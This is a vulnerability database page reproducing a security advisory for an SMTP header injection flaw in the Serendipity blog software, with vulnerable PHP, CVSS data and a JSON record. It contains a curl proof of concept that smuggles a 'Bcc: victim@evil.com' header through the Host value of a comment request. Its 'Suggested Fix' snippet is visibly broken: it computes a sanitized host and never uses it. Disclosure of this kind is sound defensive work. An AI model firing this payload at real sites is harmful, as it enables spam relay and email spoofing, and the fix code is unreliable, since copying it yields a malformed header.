GHSA-458G-Q4FH-MJ6R

Vulnerability from github – Published: 2026-04-14 22:32 – Updated: 2026-04-14 22:32
VLAI?
Summary
Serendipity has a Host Header Injection allows SMTP header injection via unvalidated HTTP_HOST in Message-ID email header
Details

Summary

Serendipity inserts $_SERVER['HTTP_HOST'] directly into the Message-ID SMTP header without any validation beyond CRLF stripping. An attacker who can control the Host header during an email-triggering action can inject arbitrary SMTP headers into outgoing emails, enabling spam relay, BCC injection, and email spoofing.

Details

In include/functions.inc.php:548:

$maildata['headers'][] = 'Message-ID: <' 
    . bin2hex(random_bytes(16)) 
    . '@' . $_SERVER['HTTP_HOST']  // ← unsanitized, attacker-controlled
    . '>';

The existing sanitization function only blocks \r\n and URL-encoded variants:

function serendipity_isResponseClean($d) {
    return (strpos($d, "\r") === false && strpos($d, "\n") === false 
        && stripos($d, "%0A") === false && stripos($d, "%0D") === false);
}

Critically, serendipity_isResponseClean() is not even called on HTTP_HOST before embedding it into the mail headers — making this exploitable with any character that SMTP interprets as a header delimiter.

Email is triggered by actions such as: - New comment notifications to blog owner - Comment subscription notifications to subscribers - Password reset emails (if configured)

PoC

# Trigger comment notification email with injected header
curl -s -X POST \
  -H "Host: attacker.com>\r\nBcc: victim@evil.com\r\nX-Injected:" \
  -d "serendipity[comment]=test&serendipity[name]=hacker&serendipity[email]=a@b.com&serendipity[entry_id]=1" \
  http://[TARGET]/comment.php

Resulting malicious Message-ID header in outgoing email:

Message-ID: <deadbeef@attacker.com>
Bcc: victim@evil.com
X-Injected: >

Impact

An attacker can control the domain portion of the Message-ID header in all outgoing emails sent by Serendipity (comment notifications, subscriptions). This enables: - Identity spoofing — emails appear to originate from attacker-controlled domain - Reply hijacking — some mail clients use Message-ID for threading, pointing replies toward attacker infrastructure - Email reputation abuse — attacker's domain embedded in legitimate mail headers

Suggested Fix

Sanitize HTTP_HOST before embedding in mail headers, and restrict to valid hostname characters only:

$safe_host = preg_replace('/[^a-zA-Z0-9.\-]/', '', 
    parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST)
);
$maildata['headers'][] = 'Message-ID: ';
Severity ?
7.2 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "s9y/serendipity"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39971"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T22:32:38Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nSerendipity inserts `$_SERVER[\u0027HTTP_HOST\u0027]` directly into the `Message-ID` SMTP header without any validation beyond CRLF stripping. An attacker who can control the `Host` header during an email-triggering action can inject arbitrary SMTP headers into outgoing emails, enabling spam relay, BCC injection, and email spoofing.\n\n### Details\nIn `include/functions.inc.php:548`:\n```php\n$maildata[\u0027headers\u0027][] = \u0027Message-ID: \u003c\u0027 \n    . bin2hex(random_bytes(16)) \n    . \u0027@\u0027 . $_SERVER[\u0027HTTP_HOST\u0027]  // \u2190 unsanitized, attacker-controlled\n    . \u0027\u003e\u0027;\n```\n\nThe existing sanitization function only blocks `\\r\\n` and URL-encoded variants:\n```php\nfunction serendipity_isResponseClean($d) {\n    return (strpos($d, \"\\r\") === false \u0026\u0026 strpos($d, \"\\n\") === false \n        \u0026\u0026 stripos($d, \"%0A\") === false \u0026\u0026 stripos($d, \"%0D\") === false);\n}\n```\n\nCritically, `serendipity_isResponseClean()` is **not even called** on `HTTP_HOST` before embedding it into the mail headers \u2014 making this exploitable with any character that SMTP interprets as a header delimiter.\n\nEmail is triggered by actions such as:\n- New comment notifications to blog owner\n- Comment subscription notifications to subscribers\n- Password reset emails (if configured)\n\n### PoC\n```bash\n# Trigger comment notification email with injected header\ncurl -s -X POST \\\n  -H \"Host: attacker.com\u003e\\r\\nBcc: victim@evil.com\\r\\nX-Injected:\" \\\n  -d \"serendipity[comment]=test\u0026serendipity[name]=hacker\u0026serendipity[email]=a@b.com\u0026serendipity[entry_id]=1\" \\\n  http://[TARGET]/comment.php\n```\nResulting malicious `Message-ID` header in outgoing email:\n```\nMessage-ID: \u003cdeadbeef@attacker.com\u003e\nBcc: victim@evil.com\nX-Injected: \u003e\n```\n\n### Impact\nAn attacker can control the domain portion of the `Message-ID` header in all outgoing emails sent by Serendipity (comment notifications, subscriptions). \nThis enables:\n- **Identity spoofing** \u2014 emails appear to originate from attacker-controlled domain\n- **Reply hijacking** \u2014 some mail clients use Message-ID for threading, pointing replies toward attacker infrastructure\n- **Email reputation abuse** \u2014 attacker\u0027s domain embedded in legitimate mail headers\n### Suggested Fix\nSanitize `HTTP_HOST` before embedding in mail headers, and restrict to valid hostname characters only:\n```php\n$safe_host = preg_replace(\u0027/[^a-zA-Z0-9.\\-]/\u0027, \u0027\u0027, \n    parse_url(\u0027http://\u0027 . $_SERVER[\u0027HTTP_HOST\u0027], PHP_URL_HOST)\n);\n$maildata[\u0027headers\u0027][] = \u0027Message-ID: \u0027;\n```",
  "id": "GHSA-458g-q4fh-mj6r",
  "modified": "2026-04-14T22:32:38Z",
  "published": "2026-04-14T22:32:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/s9y/Serendipity/security/advisories/GHSA-458g-q4fh-mj6r"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/s9y/Serendipity"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Serendipity has a Host Header Injection allows SMTP header injection via unvalidated HTTP_HOST in Message-ID email header"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.